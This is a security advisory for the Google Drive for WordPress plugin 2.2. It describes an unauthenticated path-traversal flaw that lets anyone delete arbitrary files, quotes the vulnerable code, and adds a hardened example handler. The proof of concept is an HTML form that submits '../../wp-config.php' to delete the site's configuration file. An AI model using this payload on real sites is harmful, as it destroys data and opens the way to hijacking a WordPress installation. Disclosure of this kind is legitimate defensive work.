Plugin Google Drive for WordPress 2.2 – Arbitrary File Deletion – Unlik

Details

  • Name : Google Drive for WordPress
  • Version : 2.2
  • Homepage : https://wordpress.org/plugins/wp-google-drive/

Type

  • Arbitrary File Deletion

Description

  • User access required: none (the handler is reachable without logging in).
  • $_POST['file_name'] is not sanitized or validated before being used to build a filesystem path.

Code

 
File:  wp-content/plugins/wp-google-drive/gdrive-ajaxs.php
Line:  15 - 22

switch ( $_POST['ajaxstype'] ) {
...
case 'del_fl_bkp':
   gd_delete_listById( $_POST['id'] );
   $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH . "/" . $_POST['file_name'];
   unlink( $dir );

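For contrast, an added hardened version of the same handler (example code, not the plugin's own; the function name gd_safe_delete_backup and the 'manage_options' capability and nonce action name are assumptions). It requires an authenticated administrator, strips directory components from the name and confirms the resolved path stays inside the backup folder before calling unlink():

```php
<?php
// Added example, not the plugin's own code. gd_safe_delete_backup() is a
// hypothetical helper; GBACKUP_PLUGIN_BACKUPFOLDER_PATH and gd_delete_listById()
// are the names that appear in the advisory's code excerpt.

function gd_safe_delete_backup( $file_name ) {
    // 1. Only logged-in administrators may delete backups. The original
    //    handler performs no authentication or authorization at all.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'forbidden', 'Insufficient privileges' );
    }

    // 2. Strip every directory component so a traversal name such as
    //    "../../wp-config.php" is reduced to "wp-config.php". Reject empty
    //    names and dotfiles.
    $base = basename( $file_name );
    if ( '' === $base || 0 === strpos( $base, '.' ) ) {
        return new WP_Error( 'bad_name', 'Invalid file name' );
    }

    // 3. Resolve both paths and confirm the target really lives inside the
    //    backup folder (also covers symlinks that point elsewhere).
    $root   = realpath( GBACKUP_PLUGIN_BACKUPFOLDER_PATH );
    $target = realpath( $root . '/' . $base );
    if ( false === $root || false === $target
         || 0 !== strpos( $target, $root . DIRECTORY_SEPARATOR ) ) {
        return new WP_Error( 'outside', 'File is not in the backup folder' );
    }

    // 4. Only regular files may be removed, never directories or devices.
    if ( ! is_file( $target ) ) {
        return new WP_Error( 'not_file', 'Not a regular file' );
    }

    return unlink( $target );
}

// Dispatcher: the nonce binds the request to a page the administrator
// actually loaded, so a form submitted from a third-party site is rejected
// before any deletion happens.
if ( isset( $_POST['ajaxstype'] ) && 'del_fl_bkp' === $_POST['ajaxstype'] ) {
    check_ajax_referer( 'gd_delete_backup', '_wpnonce' );
    $result = gd_safe_delete_backup( (string) $_POST['file_name'] );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message() );
    }
    gd_delete_listById( absint( $_POST['id'] ) );
    wp_send_json_success();
}
```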

Proof of Concept

https://www.youtube.com/watch?v=_536kM2-TZI

1 - Submit the following form to the target:

<form method="post"
      action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
   <input type="text" name="ajaxstype" value="del_fl_bkp">
   <input type="text" name="file_name" value="../../wp-config.php">
   <input type="text" name="id" value="1">
   <input type="submit">
</form>

Results

The file wp-config.php is deleted, which makes it possible to restart the whole system (the WordPress installation setup).

Note


Solution


Timeline

  • Date Discovery : 11/25/2017
  • Date Vendor Contact : 12/26/2017
  • Date Publish :
  • Date Resolution :